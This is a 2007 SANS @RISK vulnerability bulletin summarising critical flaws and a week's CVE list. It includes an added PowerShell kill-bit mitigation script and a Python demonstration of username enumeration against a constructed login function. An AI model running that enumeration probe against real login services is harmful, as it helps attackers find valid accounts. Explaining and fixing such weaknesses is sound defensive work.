@RISK: The Consensus Security Vulnerability Alert

Volume: VI, Issue: 34
August 20, 2007

This week had more highlighted critical vulnerabilities than any week I can remember. The most critical are in Microsoft products, including Internet Explorer, and in Pegasus Mercury Mail. Another important vulnerability was discovered in the Java runtime environment that is found on Solaris, Mac OS X and often on Windows systems. Alan

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Platform                                 Number of Updates and Vulnerabilities
    ---------------------------------------  -------------------------------------
    Windows                                   7 (#1, #2, #3, #4, #10, #12)
    Microsoft Office                          1 (#7)
    Other Microsoft Products                  7 (#11)
    Third Party Windows Apps                 10 (#5, #6, #13)
    Mac Os                                    1
    Linux                                     1
    Aix                                       3
    Unix                                      3
    Cross Platform                           12 (#8, #9, #14, #15, #16)
    Web Application - Cross Site Scripting    3
    Web Application - SQL Injection           3
    Web Application                          17
    Network Device                            3 (#17)

********** Sponsored By SANS Network Security and SANS London ***********

Come join us in Las Vegas on September 22-30 for SANS Network Security or in London on 26 Nov to 05 Dec, 2007 (or both) for the biggest SANS training conferences we've ever held in the US and Europe. In Las Vegas, there are more than 40 courses and a big product expo. In London we have 10 classes and the GSSP exam. How good have these events been? Here's what past attendees said: "You learn something new every day...the experience of the instructor and of the students make the difference." (Gabriel Schmitt, Hoffmann-LaRoche) "An extraordinary amount of information covered in a week, backed up with excellent documentation for those long winter nights." (Keith Mellism, Canada Life) "The depth of knowledge is awesome." (Stephen Hall, Barclays) "This course has valuable information that can be implemented immediately in the work place." (Christopher O'Brien, Booz Allen Hamilton) "The quality of teachers, speakers, and even attendees is far superior to any other training event I've attended." (Corinne Cook, Jeppesen) "You will never ever find anything more valuable than SANS superknowledge. Worth the price!!" (Carlos Fragoso, CESCA) Registration information: Las Vegas: http://www.sans.org/ns2007 London: http://www.sans.org/info/14431

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Microsoft Office
Other Microsoft Products
Third Party Windows Apps
Mac Os
Linux
Aix
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

************************* Sponsored Links *****************************

1) The new Norman SandBox products drastically reduce the time, complexity, and infrastructure required to analyze suspicious files. http://www.sans.org/info/14436

2) SANS OnSite Program can deliver all of our courses to your location and realize significant overall savings at the same time. http://www.sans.org/info/14441

*************************************************************************

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (3) CRITICAL: Microsoft Internet Explorer Multiple Vulnerabilities (MS07-045)
  • Affected:
    • Microsoft Windows 2000
    • Microsoft Windows XP
    • Microsoft Windows Server 2003
    • Microsoft Windows Vista
    • Microsoft Internet Explorer versions 6 and 7
  • Description: Microsoft Internet Explorer contains multiple vulnerabilities. A failure to properly parse Cascading Style Sheets (CSS), used to provide styling information for web pages, can lead to a memory corruption vulnerability. Style sheets are automatically downloaded by Internet Explorer when visiting a web site that uses them. Additionally, several ActiveX components that were not intended to be instantiated by Internet Explorer can, in fact, be instantiated by Internet Explorer. A malicious web site that instantiates these components can trigger a memory corruption vulnerability. Successfully exploiting any of these vulnerabilities would allow an attacker to execute arbitrary code with the privileges of the current user.

  • Status: Microsoft confirmed, updates available. Users can mitigate the impact of the ActiveX vulnerabilities by disabling the affected controls via Microsoft's "kill bit" mechanism for the following CLSIDs: 8B217746-717D-11CE-AB5B-D41203C10000, 8B217752-717D-11CE-AB5B-D41203C10000, 8B21775E-717D-11CE-AB5B-D41203C10000, and 0DDF3B5C-E692-11D1-AB06-00AA00BDD685.

  • References:
  • (4) CRITICAL: Microsoft Vector Markup Language Remote Code Execution (MS07-050)
  • Affected:
    • Microsoft Windows 2000
    • Microsoft Windows XP
    • Microsoft Windows Server 2003
    • Microsoft Windows Vista
    • Microsoft Internet Explorer versions 5.01, 6 and 7
  • Description: The Vector Markup Language (VML) is an XML-based markup language used to draw vector images. It is supported by Microsoft Internet Explorer to display vector images on websites. Internet Explorer contains a flaw in its handling of compressed image data referenced by VML documents. A specially crafted web page could exploit this vulnerability to execute arbitrary code with the privileges of the current user. Note that VML data is rendered automatically by Internet Explorer, so simply visiting a malicious page is sufficient to trigger the flaw. A simple proof-of-concept and some technical details are available for this vulnerability.

  • Status: Microsoft confirmed, updates available.

  • References:
  • (6) HIGH: Yahoo! Instant Messenger Video Conferencing Vulnerability
  • Affected:
    • Yahoo! Instant Messenger versions 8.1.0.413 and prior
  • Description: The Yahoo! Instant Messenger application allows users to videoconference with one another. A user who accepts a videoconference invitation then receives a JPEG-2000 video stream from the remote user. The Yahoo! Instant Messenger application fails to properly handle invalid JPEG-2000 data, so a specially crafted video stream can trigger a buffer overflow in the application. Successfully exploiting this vulnerability would allow an attacker to execute arbitrary code with the privileges of the current user. Note that the user must explicitly accept the video conferencing invitation to be vulnerable.

  • Status: Yahoo! has not confirmed, no updates available. Users can mitigate the impact of this vulnerability by blocking TCP port 5100 at the network perimeter, if possible.

  • References:
  • (7) HIGH: Microsoft Excel File Parsing Remote Code Execution (MS07-044)
  • Affected:
    • Microsoft Office 2000
    • Microsoft Office XP
    • Microsoft Office 2003
    • Microsoft Office 2004 for Mac
  • Description: Microsoft Excel contains a flaw in its parsing of Excel spreadsheet files. A specially crafted spreadsheet file could exploit this vulnerability to execute arbitrary code with the privileges of the current user. It is believed that only Excel Workspace files are affected. Note that some technical details are publicly available for this vulnerability. Versions of Microsoft Office later than Office 2000 prompt the user before opening an Excel file received from the web or e-mail, so exploitation on those versions requires the user to accept the prompt.

  • Status: Microsoft confirmed, updates available.

  • References:
  • (8) HIGH: Opera Web Browser JavaScript Remote Code Execution
  • Affected:
    • Opera Web Browser versions prior to 9.23
  • Description: The Opera Web Browser (generally just called Opera) is a popular multiplatform web browser. Opera contains a vulnerability in its handling of JavaScript scripts. A specially crafted web page containing such a script could trigger this vulnerability and execute arbitrary code with the privileges of the current user. Note that some technical details, including details on vulnerability discovery and instructions for exploitation, are publicly available. Opera is commonly deployed on mobile and embedded devices, but is widely used in desktop environments as well.

  • Status: Opera confirmed, updates available.

  • References:
  • (9) HIGH: Sun Java Runtime Environment Font Processing Overflow
  • Affected:
    • Sun Java Runtime Environment versions prior to 1.5.0_10 and 1.4.2_15
  • Description: The Sun Java Runtime Environment contains a flaw in the handling of font files. These files can be included with remotely launched Java applets and applications. A specially crafted font file could exploit this flaw and trigger a buffer overflow. Successfully exploiting this buffer overflow would allow an attacker to execute arbitrary code with the privileges of the current user. Note that Java applets are often loaded automatically in web pages. The Sun Java Runtime Environment is installed by default on Sun Solaris, Apple Mac OS X, and several other operating systems. It is often installed on Microsoft Windows as well.

  • Status: Sun confirmed, updates available.

  • References:
  • (10) MODERATE: Microsoft GDI Remote Code Execution (MS07-046)
  • Affected:
    • Microsoft Windows 2000
    • Microsoft Windows XP
    • Microsoft Windows Server 2003
  • Description: The Microsoft Graphics Device Interface (GDI) allows applications to produce graphics and text on various devices. The GDI fails to properly handle the rendering of certain Windows Metafile image files. A specially crafted image file could trigger this vulnerability and allow an attacker to execute arbitrary code with the privileges of the current user. Note that Windows Metafile image files are not normally rendered by Internet Explorer; therefore malicious web sites cannot normally exploit this vulnerability. Other avenues of exploitation include email attachments and downloaded files opened in applications that do render metafiles. Some technical details are available for this vulnerability.

  • Status: Microsoft confirmed, updates available.

  • References:
  • (11) MODERATE: Microsoft Windows Media Player Multiple Vulnerabilities (MS07-047)
  • Affected:
    • Microsoft Windows 2000
    • Microsoft Windows XP
    • Microsoft Windows Server 2003
    • Microsoft Windows Vista
  • Description: Microsoft Windows Media Player is Microsoft's streaming media player for Microsoft Windows. This player supports "skinning" - the ability to alter the appearance and behavior of the player's user interface according to "skin" files. Windows Media Player contains several vulnerabilities in the parsing of skin files. A specially crafted skin file could exploit one of these vulnerabilities to execute arbitrary code with the privileges of the current user. Note that, in most configurations, users are prompted before downloading a skin file. To exploit this vulnerability, an attacker would have to convince a user to apply the skin once it had been downloaded.

  • Status: Microsoft confirmed, updates available.

  • References:
  • (13) MODERATE: Lenovo Automated Solutions ActiveX Control Multiple Vulnerabilities
  • Affected:
    • Lenovo Automated Solutions
  • Description: The Lenovo Automated Solutions system is installed on Lenovo and IBM desktop systems and is used by support personnel to provide technical support. This system includes several ActiveX controls that contain various vulnerabilities. These controls fail to properly validate input to methods they export; these methods allow the execution of arbitrary commands, the downloading of files, and access to system configuration. A malicious web page that instantiated one of these controls could exploit these vulnerabilities.

  • Status: Lenovo confirmed, updates available. Users can mitigate the impact of these vulnerabilities by disabling the vulnerable controls via Microsoft's "kill bit" mechanism for the following CLSIDs: E598AC61-4C6F-4F4D-877F-FAC49CA91FA3, E598AC61-4C6F-4F4D-877F-FAC49CA91FA3, E598AC61-4C6F-4F4D-877F-FAC49CA91FA3. Note that Microsoft Security Update MS07-045 also disables these controls.

  • References:
  • (14) MODERATE: Rsync Multiple Buffer Overflows
  • Affected:
    • Rsync versions 2.6.9 and prior
  • Description: Rsync is a file synchronization utility used and installed by default on a variety of Unix, Unix-like, and Linux systems (including Apple Mac OS X). This utility can be run in server mode, allowing remote clients to connect and synchronize data. This utility contains two buffer overflow vulnerabilities in its handling of overlong filenames. An attacker could exploit these buffer overflows to execute arbitrary code with the privileges of the vulnerable process. Note that full technical details are available for this vulnerability, both in the advisory and through source code analysis.

  • Status: Rsync has not confirmed, no updates available.

  • References:
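The "kill bit" mitigation recommended for items (3) and (13) above is a registry setting, and the same script both applies it and verifies it. This is an added example written for this bulletin; it is not code from the bulletin, from Microsoft, or from Lenovo. The four CLSIDs are the ones listed under item (3) (MS07-045); to cover item (13) substitute the Lenovo control CLSIDs given there. The registry path and the 0x400 flag are the documented kill-bit mechanism (Microsoft KB 240797, referenced in Part II); the assumption is that the script runs in an elevated PowerShell prompt on the affected Windows version.

```powershell
# Added example (not from the bulletin, Microsoft, or Lenovo): set and verify
# the ActiveX kill bit for a list of CLSIDs. The CLSIDs below are the ones the
# MS07-045 entry (item 3) names; replace them with the Lenovo CLSIDs for item 13.
# Mechanism (KB 240797): Internet Explorer refuses to instantiate a control when
#   HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}
# has bit 0x400 set in its "Compatibility Flags" DWORD value.
# Assumption: run from an elevated (administrator) PowerShell prompt.

$Clsids = @(
    '{8B217746-717D-11CE-AB5B-D41203C10000}',
    '{8B217752-717D-11CE-AB5B-D41203C10000}',
    '{8B21775E-717D-11CE-AB5B-D41203C10000}',
    '{0DDF3B5C-E692-11D1-AB06-00AA00BDD685}'
)
$KillBit = 0x400

# On 64-bit Windows the 32-bit Internet Explorer reads the Wow6432Node view of
# the registry, so the bit has to be set in both views to be effective.
$Roots = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
    $Roots += 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
}

function Set-KillBit([string]$Root, [string]$Clsid) {
    $key = Join-Path $Root $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $item  = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    $flags = if ($null -ne $item) { [int]$item.'Compatibility Flags' } else { 0 }
    # OR the bit in rather than overwriting, so any other compatibility flags
    # already present for this control are preserved.
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value ($flags -bor $KillBit) -Type DWord
}

function Test-KillBit([string]$Root, [string]$Clsid) {
    $item = Get-ItemProperty -Path (Join-Path $Root $Clsid) -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $false }
    return (([int]$item.'Compatibility Flags' -band $KillBit) -eq $KillBit)
}

foreach ($root in $Roots) {
    $view = if ($root -like '*Wow6432Node*') { '32-bit view' } else { 'native view' }
    foreach ($clsid in $Clsids) {
        Set-KillBit $root $clsid
        # Verification pass: a "False" here means the write did not take
        # (insufficient rights or a policy-managed key) and needs follow-up.
        '{0,-12} {1}  kill bit set: {2}' -f $view, $clsid, (Test-KillBit $root $clsid)
    }
}
```

No reboot is needed; Internet Explorer checks the kill bit each time it instantiates a control. The verification loop is the part worth keeping after MS07-045 is deployed, since the update sets the same bits itself and a negative result then indicates a machine that did not get the patch.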
Other Software
  • (15) MODERATE: SurgeMail "SEARCH" Buffer Overflow
  • Affected:
    • SurgeMail IMAP Servers
  • Description: SurgeMail is a popular mail and groupware suite for several operating systems. Its included IMAP server fails to properly handle overlong arguments to the IMAP "SEARCH" command. A specially crafted SEARCH request could exploit this vulnerability to execute arbitrary commands with the privileges of the vulnerable process. Note that attackers would require authentication to successfully exploit this vulnerability.

  • Status: SurgeMail has not confirmed, no updates available.

  • References:
  • (16) MODERATE: Fedora Commons Authentication Bypass
  • Affected:
    • Fedora Commons versions prior to 2.2.1
  • Description: Fedora Commons is an open source project that provides tools for the management of digital media and content. A logic error in the handling of authentication requests when users authenticate via the Lightweight Directory Access Protocol (LDAP) could lead to a condition in which a user is successfully authenticated with invalid credentials. Note that it is believed that this only occurs during authentication against LDAP servers; other authentication methods are unaffected. Full technical details for this vulnerability are available in the bug report and via source code analysis.

  • Status: Fedora Commons confirmed, updates available.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 34, 2007

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5397 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 07.34.1 - CVE: CVE-2007-2223
  • Platform: Windows
  • Title: Microsoft XML Core Services Remote Code Execution
  • Description: Microsoft XML Core Services (MSXML) is a software component that allows multiple programming languages to support XML-based communication. The application is exposed to a remote code execution issue because the software fails to properly validate memory requests.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-042.mspx

  • 07.34.2 - CVE: CVE-2007-3034
  • Platform: Windows
  • Title: Microsoft Windows GDI Image File Remote Code Execution
  • Description: Microsoft Windows GDI (Graphics Device Interface) is an abstraction layer allowing applications to interact indirectly with displays and printers. The application is exposed to a remote code execution issue because it fails to properly bounds check user-supplied image data.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-046.mspx

  • 07.34.3 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft Windows Vista Contacts Gadget Remote Code Execution
  • Description: Windows Vista gadgets are mini-applications that provide information or utilities to users. The Contacts gadget is exposed to a remote code execution issue because it fails to adequately sanitize user-supplied HTML data. This issue occurs when a user adds or imports a malicious contact file to the affected gadget.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-048.mspx

  • 07.34.4 - CVE: CVE-2007-3891
  • Platform: Windows
  • Title: Microsoft Windows Vista Weather Gadget Remote Code Execution
  • Description: Windows Vista Gadgets are mini-applications that provide information or utilities to users. The Weather gadget is exposed to a remote code execution issue because it fails to adequately validate certain HTML attributes.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-048.mspx

  • 07.34.5 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft OLE Automation Remote Code Execution
  • Description: Microsoft's Object Linking and Embedding (OLE) Automation is a Windows protocol that permits applications to share data or to control other applications. OLE Automation is exposed to a remote code execution issue because it fails to handle specially crafted script requests.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-043.mspx

  • 07.34.6 - CVE: CVE-2007-3033
  • Platform: Windows
  • Title: Microsoft Windows Vista Feed Headlines Gadget Remote Code Execution
  • Description: Windows Vista Feed Headlines gadget is an RSS-feed application. Gadgets are mini-applications in Windows Vista that provide information or utilities to users. The gadget is exposed to a remote code execution issue because it fails to adequately sanitize user-supplied HTML data.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-048.mspx

  • 07.34.7 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft DirectX Media SDK DXTLIPI.DLL ActiveX Control Buffer Overflow
  • Description: Microsoft DirectX Media SDK is a set of multimedia-related APIs for Microsoft Windows. Microsoft DirectX Media SDK "DXTLIPI.DLL" ActiveX control is exposed to a buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. Microsoft DirectX Media SDK 6.0 with DXTLIPI.DLL version 6.0.2.827 is affected.
  • Ref: http://support.microsoft.com/kb/240797

  • 07.34.8 - CVE: CVE-2007-3890
  • Platform: Microsoft Office
  • Title: Microsoft Excel Worksheet Index Value Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. The application is exposed to a remote code execution issue because it fails to perform sufficient validation when denoting the index value of an Excel worksheet.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-044.mspx

  • 07.34.9 - CVE: CVE-2007-3035
  • Platform: Other Microsoft Products
  • Title: Microsoft Windows Media Player Remote Skin Decompression Code Execution
  • Description: Microsoft Windows Media Player is a multimedia application available for the Microsoft Windows operating system. The application is exposed to a remote code execution issue when handling specially crafted compressed skin files.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-047.mspx

  • 07.34.10 - CVE: CVE-2007-1749
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer Vector Markup Language VGX.DLL Remote Buffer Overflow
  • Description: VML (Vector Markup Language) is an XML-based language used for rendering vector graphics. The application is exposed to a buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-050.mspx

  • 07.34.11 - CVE: CVE-2007-3037
  • Platform: Other Microsoft Products
  • Title: Microsoft Windows Media Player Remote Skin Header Code Execution
  • Description: Microsoft Windows Media Player is a multimedia application available for the Microsoft Windows operating system. The application is exposed to a remote code execution issue when handling specially crafted skin files.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-047.mspx

  • 07.34.12 - CVE: CVE-2007-0943
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer CSS Strings Memory Corruption
  • Description: Microsoft Internet Explorer is exposed to a remote code execution issue because it fails to properly handle certain CSS data. This issue stems from a memory corruption flaw when the application attempts to process certain CSS (Cascading Style Sheets) strings while rendering HTML documents. Internet Explorer 5.01 SP4 running on Microsoft Windows 2000 SP4 is affected.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-045.mspx

  • 07.34.13 - CVE: CVE-2007-2216
  • Platform: Other Microsoft Products
  • Title: Microsoft Visual Basic 6 TBLinf32.DLL ActiveX Control Remote Code Execution
  • Description: The Microsoft Visual Basic 6 TypeLib Information Library (TLI) "tblinf32.dll" ActiveX control is exposed to a remote code execution issue. It allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer).
  • Ref: http://support.microsoft.com/kb/240797

  • 07.34.14 - CVE: CVE-2007-3041
  • Platform: Other Microsoft Products
  • Title: Microsoft Visual Basic 6 Package and Deployment Wizard ActiveX Control Remote Code Execution
  • Description: The Microsoft Visual Basic 6 Package and Deployment Wizard "pdwizard.ocx" ActiveX control is exposed to a remote code execution issue.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-045.mspx

  • 07.34.15 - CVE: CVE-2007-0948
  • Platform: Other Microsoft Products
  • Title: Microsoft Virtual PC and Virtual Server Heap Overflow
  • Description: Microsoft Virtual PC and Virtual Server are virtualization applications for Microsoft Windows and Mac OS X operating systems. The application is exposed to a local heap overflow issue that stems from a problem with the interaction and initialization of certain components that communicate with the host operating system.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-049.mspx

  • 07.34.16 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: EDraw Office Viewer Component ActiveX Control Arbitrary File Overwrite
  • Description: The EDraw Office Viewer Component is an ActiveX control to display and interact with Microsoft Office files such as Word, Excel, PowerPoint, Project, and Visio. The application is exposed to an arbitrary file overwrite issue in the method called "HttpDownloadFile". The EDraw Office Viewer Component version 5.1 is affected.
  • Ref: http://support.microsoft.com/kb/240797

  • 07.34.17 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Yahoo! Messenger KDU_V32M.DLL Remote Denial of Service
  • Description: Yahoo! Messenger is an instant messaging application available for multiple operating platforms. Yahoo! Messenger is exposed to a remote denial of service issue that occurs in the "kdu_v32M.dll" library. Yahoo! Messenger version 8.1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25330

  • 07.34.18 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Live For Speed Multiple Vulnerabilities
  • Description: Live For Speed is an online racing simulator for Microsoft Windows. It has a number of modes of operation including demo, LAN, S1 (Internet), and S2 (hidden). The application is exposed to multiple issues. Live for Speed Demo versions S1 and S2 are affected.
  • Ref: http://www.securityfocus.com/bid/25327

  • 07.34.19 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Motive Service Activation Manager and Service Manager Remote Code Execution
  • Description: Service Activation Manager is an application that allows users to activate new subscribers. Self Service Manager is an application that allows subscribers to manage their mobile services. Motive Service Activation Manager and Service Manager are exposed to a remote code execution issue that occurs in the ActiveX control.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-045.mspx

  • 07.34.20 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Lenovo Inline Automated Solutions ActiveX Controls Remote Code Execution
  • Description: Lenovo Inline Automated Solutions ActiveX controls are exposed to a remote code execution issue that occurs in the ActiveX controls. Lenovo Inline Automated Solutions versions prior to "acpcontroller.dll" ActiveX control 1.2.8.0 and "acpir.dll" ActiveX control 1.0.0.9 are affected.
  • Ref: http://www.kb.cert.org/vuls/id/426737

  • 07.34.21 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Diskeeper DKService.EXE Remote Information Disclosure
  • Description: Diskeeper is a hard disk drive maintenance and data integrity system available for the Microsoft Windows operating system. The application is exposed to an information disclosure issue because the affected service fails to restrict access to the "MIDL" RPC function. Diskeeper versions 9 Professional and 2007 Pro Premier are affected.
  • Ref: http://www.securityfocus.com/bid/25320

  • 07.34.22 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Qbik WinGate SMTP Service Command Format String
  • Description: Qbik WinGate is an internet gateway and communications server for the Microsoft Windows operating system. The application is exposed to a remote format string issue because it fails to properly sanitize user-supplied input before including it in the format specifier argument of a formatted printing function. Qbik WinGate version 6.2.1 is affected.
  • Ref: http://www.wingate.com/showfaq.php?faqid=2

  • 07.34.23 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Symantec Altiris Deployment Solution Local Privilege Escalation
  • Description: Symantec Altiris Deployment Solution is software for deploying and managing servers, desktops, notebooks, thin clients and handheld devices from a centralized location. It is available for Microsoft Windows. The application is exposed to a local privilege escalation issue that occurs in the "Log File Viewer" of the "Aclient" process.
  • Ref: http://www.symantec.com/avcenter/security/Content/2007.08.13.html

  • 07.34.24 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: AMD ATI ATIDSMXX.SYS Driver Local Privilege Escalation
  • Description: ATI is the graphics hardware/software development division of AMD. The ATI atidsmxx.sys driver is exposed to a local privilege escalation issue: the driver carries a signature that Windows Vista accepts, yet it exposes an interface that lets user-mode code read and write arbitrary kernel memory. atidsmxx.sys version 3.0.502.0 is affected.
  • Ref: http://blogs.zdnet.com/security/?p=427

  • 07.34.25 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: WinGate SMTP Session Invalid State Remote Denial of Service
  • Description: WinGate is a proxy server application available for Microsoft Windows. The application is exposed to a denial of service issue because it fails to sanitize user-supplied input before including it in the format-specifier argument of the "vsprintf()" function. WinGate versions prior to 6.2.2 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476011

  • 07.34.26 - CVE: Not Available
  • Platform: Mac Os
  • Title: CounterPath X-Lite SIP Soft Phone Malformed Packet Denial of Service
  • Description: CounterPath X-Lite is a SIP Soft Phone for Microsoft Windows and Mac OS X operating systems. The application is exposed to a denial of service issue because the application fails to properly handle malformed data. CounterPath X-Lite SIP Soft Phone version 3.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476259

  • 07.34.27 - CVE: Not Available
  • Platform: Linux
  • Title: Fedora Commons LDAP Authentication Bypass
  • Description: Fedora Commons is a freely available platform for managing and storing digital content. The application is exposed to an authentication bypass issue because it fails to properly handle unexpected conditions during LDAP authentication. Fedora Commons versions prior to 2.2.1 are affected.
  • Ref: http://sourceforge.net/tracker/index.php?func=detail&aid=1731608&group_id=177054&atid=879703

  • 07.34.28 - CVE: Not Available
  • Platform: Aix
  • Title: IBM AIX Configuration Commands Multiple Buffer Overflow Vulnerabilities
  • Description: IBM AIX is a Unix-based operating platform. AIX is exposed to multiple buffer overflow issues because it fails to perform adequate boundary checks on user-supplied input. AIX versions 5.2.0.85 through 5.2.0.105, and 5.3.0.40 through 5.3.0.61 are affected.
  • Ref: http://www.securityfocus.com/bid/25270

  • 07.34.29 - CVE: Not Available
  • Platform: Aix
  • Title: IBM AIX Fileplace Command Buffer Overflow Vulnerabilities
  • Description: IBM AIX is exposed to a buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input. This issue occurs in the "fileplace" command. AIX versions 5.2.0.85 through 5.2.0.105, and 5.3.0.40 through 5.3.0.61 are affected.
  • Ref: http://www.securityfocus.com/bid/25271

  • 07.34.30 - CVE: Not Available
  • Platform: Aix
  • Title: IBM AIX at Command Local Buffer Overflow
  • Description: AIX is a Unix operating system from IBM. The application is exposed to a local buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input. AIX versions 5.3.0.0 through 5.3.0.60 are affected.
  • Ref: http://www.securityfocus.com/bid/25273

  • 07.34.31 - CVE: CVE-2007-4091
  • Platform: Unix
  • Title: Rsync F_Name Off-By-One Buffer Overflow
  • Description: The rsync utility is used to synchronize files and directory structures across a network. It is commonly used to maintain mirrors of FTP sites, often through anonymous access to the rsync server. It is available for Unix, Linux, and other Unix-like operating systems. The application is exposed to an off-by-one buffer overflow issue due to a failure of the application to properly bounds check user-supplied input. Rsync version 2.6.9 is affected.
  • Ref: http://article.gmane.org/gmane.linux.debian.devel.bugs.general/291908

  • 07.34.32 - CVE: Not Available
  • Platform: Unix
  • Title: Tomboy LD_LIBRARY_PATH Environment Variable Local Privilege Escalation
  • Description: Tomboy is a desktop note-taking application available for Unix, Linux and other Unix-like operating systems. The application is exposed to a local privilege escalation issue that occurs when the "/usr/bin/tomboy" script sets the "LD_LIBRARY_PATH" environment variable incorrectly.
  • Ref: http://bugs.gentoo.org/show_bug.cgi?id=188806

  • 07.34.33 - CVE: Not Available
  • Platform: Unix
  • Title: Universal Ircd Server Multiple Remote Vulnerabilities
  • Description: Universal Ircd (ircu) is a freely available Internet Relay Chat (IRC) server. The application is exposed to multiple remote issues, including denial of service issues and privilege escalation issues.
  • Ref: http://www.securityfocus.com/archive/1/476285

  • 07.34.34 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM DB2 Universal Database Multiple Unspecified Vulnerabilities
  • Description: IBM DB2 Universal Database Server is a database server application designed to run on various platforms including Linux, AIX, Solaris, and Microsoft Windows. The application is exposed to multiple unspecified issues that may allow attackers to carry out a variety of attacks. DB2 versions 9.1 and 8 running on all supported platforms are affected.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg1IY88226

  • 07.34.35 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Symantec Enterprise Firewall Username Enumeration Weakness
  • Description: Symantec Enterprise Firewall is an enterprise-level firewall available for Microsoft Windows and Unix operating systems. The application is exposed to a username enumeration weakness: it responds differently to authentication attempts with valid and invalid usernames, allowing an attacker to determine which accounts exist.
  • Ref: http://www.symantec.com/avcenter/security/Content/2007.08.16.html
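The Symantec entry above describes the weakness in one sentence; the following added example (not Symantec's code) shows what it buys an attacker and how the fix looks. weak_login() answers differently for an unknown user and a wrong password; hardened_login() gives one answer and does the same work on both paths. The user table, passwords and candidate wordlist are constructed.

```python
"""Username enumeration through differing login responses, and the fix.

Added example, not Symantec's code. weak_login() mirrors the weakness in the
advisory: a different answer for an unknown user than for a bad password.
hardened_login() returns one message and does the same amount of work on both
paths. Users and passwords are constructed for the demonstration.
"""
import hashlib
import hmac
from collections import Counter
from typing import Callable, Dict, List


def _digest(password: str) -> str:
    # Plain SHA-256 keeps the example short; use a slow, salted KDF in production.
    return hashlib.sha256(password.encode()).hexdigest()


USERS: Dict[str, str] = {"alice": _digest("correct horse"), "dave": _digest("battery staple")}
DUMMY_DIGEST = _digest("placeholder-for-unknown-users")


def weak_login(username: str, password: str) -> str:
    if username not in USERS:
        return "unknown user"          # oracle: this user does not exist
    if _digest(password) != USERS[username]:
        return "bad password"          # oracle: this user does exist
    return "ok"


def hardened_login(username: str, password: str) -> str:
    stored = USERS.get(username, DUMMY_DIGEST)
    # compare_digest plus a dummy digest keep both timing and message identical
    # whether or not the account exists.
    password_ok = hmac.compare_digest(_digest(password), stored)
    if password_ok and username in USERS:
        return "ok"
    return "login failed"


def enumerate_users(login: Callable[[str, str], str], candidates: List[str]) -> List[str]:
    """Return the candidates whose response differs from the majority response."""
    responses = {name: login(name, "not-the-password") for name in candidates}
    if len(set(responses.values())) < 2:
        return []                      # one answer for everyone: nothing to learn
    majority, _ = Counter(responses.values()).most_common(1)[0]
    return sorted(name for name, reply in responses.items() if reply != majority)


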